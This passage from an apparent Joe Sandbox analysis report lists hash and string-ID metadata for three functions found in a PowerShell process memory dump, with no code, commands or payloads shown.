                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (0e$8,e$H1e$P/e$p0e$-e$/e
                                                                                      • API String ID: 0-2586823915
                                                                                      • Opcode ID: 71e267f5a5d28ec9721aad765775586a2e939b46ab251b88b765e86da89564d6
                                                                                      • Instruction ID: e9d475211b61a14af4ccfcfb976aa3922174a7ebe169154981390b4c597656e7
                                                                                      • Opcode Fuzzy Hash: 71e267f5a5d28ec9721aad765775586a2e939b46ab251b88b765e86da89564d6
                                                                                      • Instruction Fuzzy Hash: F141C412D8E6D38FE3668A681C1913DAEB1FF12A90B5804FFC1995709BD91E9E19C3C1
                                                                                      Function 00007FF8879B03C8 Relevance: 6.3, Strings: 5, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @Je$I$^$p@y$x.e
                                                                                      • API String ID: 0-3677563473
                                                                                      • Opcode ID: 68fed0f9f71604e39c3dfd7600fe450b2d2899d5e6bff7ac13785da057e9b9d6
                                                                                      • Instruction ID: 3187065041b01d56a002822ced54ed4240808d734c67d7e4c7a3238972b3d5b5
                                                                                      • Opcode Fuzzy Hash: 68fed0f9f71604e39c3dfd7600fe450b2d2899d5e6bff7ac13785da057e9b9d6
                                                                                      • Instruction Fuzzy Hash: 7B21A552C8EAE24FE2568A682C1D1796EB3BF42644B5C40FBC1485709FE84DED18D385
                                                                                      Function 00007FF8879B042D Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1742089279.00007FF8879B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_7ff8879b0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @Je$I$^$p@y
                                                                                      • API String ID: 0-3451460963
                                                                                      • Opcode ID: 6955062cdc464e31150553535256b5cba93fed2807ee267bdf3e3c2b9821fb6b
                                                                                      • Instruction ID: 09b9c70468ae0165ae327c495f848192b7f708e2554173de86cf204e3258c468
                                                                                      • Opcode Fuzzy Hash: 6955062cdc464e31150553535256b5cba93fed2807ee267bdf3e3c2b9821fb6b
                                                                                      • Instruction Fuzzy Hash: 78218252D4E6E24FE366496C2C2C1792FB2BF12690B4840FBC19C9B0EBE95C9D58C346